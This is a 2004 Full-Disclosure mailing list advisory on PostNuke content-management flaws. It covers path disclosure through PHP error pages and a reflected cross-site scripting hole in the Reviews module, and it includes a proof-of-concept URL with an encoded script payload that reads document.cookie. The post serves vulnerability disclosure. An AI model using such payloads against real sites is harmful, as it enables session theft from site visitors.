Full Disclosure mailing list archives
Multiple vulnerabilities PostNuke
From: "DarkBicho" <darkbicho () fastmail fm>
Date: Sun, 18 Jul 2004 03:09:58 -0700
Original Advisory: http://www.swp-zone.org/archivos/advisory-10.txt ------------------------------------------------------------------------------------------------- :.: Multiple vulnerabilities PostNuke :.: PROGRAM: PostNuke HOMEPAGE: http://www.postnuke.com/ VERSION: 0.75-RC3, 0.726-3 BUG: Multiple vulnerabilities DATE: 14/05/2004 AUTHOR: DarkBicho web: http://www.darkbicho.tk team: Security Wari Proyects <www.swp-zone.org> Perunderforce <www.perunderforce.tk> Email: darkbicho () peru com ------------------------------------------------------------------------------------------------- 1.- Affected software description: ----------------------------- Postnuke is a popular content management system, written in php. 2.- Vulnerabilities: --------------- A. Full path disclosure: This vulnerability would allow a remote user to determine the full path to the web root directory and other potentially sensitive information. http://localhost/html/modules/Xanthia/pnadmin.php Fatal error: Call to undefined function: pnmodgetvar() in c:\appserv\www\html\modules\xanthia\pnadmin.php on line 53 http://localhost/html/modules/Xanthia/pnuserapi.php Fatal error: Call to undefined function: pnmodgetvar() in c:\appserv\www\html\modules\xanthia\pnuserapi.php on line 49 B. Cross-Site Scripting aka XSS: Error: function showcontent() :.: title : Line 986 --------------------------------- code ------------------------------------------ echo "<p><span class=\"pn-title\"><strong><em>".pnVarPrepForDisplay($title)." </em></strong></span><br />"; echo "<p align=\"justify\"><span class=\"pn-normal\">"; if ($cover != "") ---------------------------------------------------------------------------------- 3.- EXPLOIT: ¨¨¨¨¨¨¨ http://localhost/html/modules.php?op=modload&name=Reviews&file=index&req=showcontent &id=1&title=%253cscript>alert%2528document.cookie);%253c/script> Example: ------- http://www.swp-zone.org/archivos/post-nuke.gif 4.- SOLUTION: ¨¨¨¨¨¨¨¨ Vendors were contacted many weeks ago and plan to release a fixed version soon. Check the PostNuke website for updates and official release details. 5.- Greetings: --------- greetings to my Peruvian group swp and perunderforce :D "EL PISCO ES Y SERA PERUANO" 5.- Contact ------- WEB: http://www.darkbicho.tk EMAIL: darkbicho () peru com ------------------------------------------------------------------------------------------------- ___________ ____________ / _____/ \ / \______ \ \_____ \\ \/\/ /| ___/ / \\ / | | /_______ / \__/\ / |____| \/ \/ Security Wari Projects (c) 2002 - 2004 Made in Peru ----------------------------------------[ EOF ]---------------------------------------------- DarkBicho Web: http://www.darkbicho.tk "Mi unico delito es ver lo que otros no pueden ver" ---------------------- The End ---------------------- _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Multiple vulnerabilities PostNuke DarkBicho (Jul 18)
- <Possible follow-ups>
- Multiple vulnerabilities PostNuke DarkBicho (Jul 18)